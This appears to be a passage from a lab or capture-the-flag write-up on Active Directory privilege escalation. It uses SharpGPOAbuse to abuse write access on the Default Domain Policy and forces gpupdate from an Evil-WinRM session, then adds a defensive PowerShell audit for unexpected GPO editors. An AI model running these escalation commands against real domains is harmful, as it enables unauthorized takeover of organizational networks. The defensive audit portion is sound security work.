Privilege Escalation

We are members of the Server Operators group, and we have write access to the Default Domain Policy object. With write access to that GPO, we can use a tool called SharpGPOAbuse.exe to add ourselves to the domain admins.

The GPO is called Default Domain Policy.

 ./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"

Then we force a Group Policy update so the modified GPO is applied.

*Evil-WinRM* PS C:\Users\anirudh\Desktop> gpupdate /force
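
The escalation above depends on a non-admin principal holding edit rights on a GPO. From the defender's side, the following audit lists such principals. It is an added example, not part of the original write-up; the allow-list of expected trustees and the function name Get-UnexpectedGpoEditor are assumptions to adjust per environment.

```powershell
# Added example: report trustees with edit rights on any GPO that are not
# on an allow-list. Requires the GroupPolicy module (RSAT / GPMC) and a
# domain-joined host with rights to read GPO security descriptors.
Import-Module GroupPolicy

# Assumption: trustees expected to hold edit rights in a default domain.
$ExpectedEditors = @('Domain Admins', 'Enterprise Admins', 'SYSTEM')

# GPPermissionType values that allow changing a GPO. GpoCustom is included
# because a custom ACE can carry write rights and needs manual review.
$EditRights = @('GpoEdit', 'GpoEditDeleteModifySecurity', 'GpoCustom')

function Get-UnexpectedGpoEditor {
    param(
        [string[]]$Allowed = $ExpectedEditors
    )
    foreach ($gpo in Get-GPO -All) {
        foreach ($ace in Get-GPPermission -Guid $gpo.Id -All) {
            $right = $ace.Permission.ToString()
            if ($EditRights -notcontains $right) { continue }   # read/apply only
            if ($ace.Denied) { continue }                        # deny ACE grants nothing
            if ($Allowed -contains $ace.Trustee.Name) { continue }
            [pscustomobject]@{
                Gpo        = $gpo.DisplayName
                GpoId      = $gpo.Id
                Trustee    = '{0}\{1}' -f $ace.Trustee.Domain, $ace.Trustee.Name
                TrusteeSid = $ace.Trustee.Sid.Value
                SidType    = $ace.Trustee.SidType
                Permission = $right
                Inherited  = $ace.Inherited
            }
        }
    }
}

# Any row for "Default Domain Policy" is a finding: that GPO is normally
# linked at the domain root and applies to every machine, including DCs.
Get-UnexpectedGpoEditor |
    Sort-Object Gpo, Trustee |
    Format-Table Gpo, Trustee, Permission, Inherited -AutoSize
```

An empty result means only the allow-listed trustees can edit GPOs; any other row should be removed or justified.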
